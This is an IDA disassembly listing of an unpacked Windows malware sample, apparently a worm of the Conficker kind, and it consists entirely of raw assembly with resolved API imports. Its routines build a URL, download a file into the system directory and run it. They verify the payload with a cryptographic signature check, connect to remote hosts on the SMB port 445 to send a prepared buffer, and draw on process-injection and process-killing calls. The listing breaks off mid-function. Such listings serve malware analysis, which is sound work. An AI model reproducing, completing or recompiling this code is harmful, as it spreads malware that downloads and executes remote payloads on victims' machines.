;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 1AA4632AD7C1F2DE1E565D408FA5E6FD
; File Name : u:\work\1aa4632ad7c1f2de1e565d408fa5e6fd_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; dword_31421088
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; dword_31421088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; dword_3142112C
push edi
call esi ; dword_3142112C
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; dword_31421098
push 0
push offset dword_31424FEC
call ebx ; dword_31421098
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; dword_31421094
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; dword_31421168
push edi
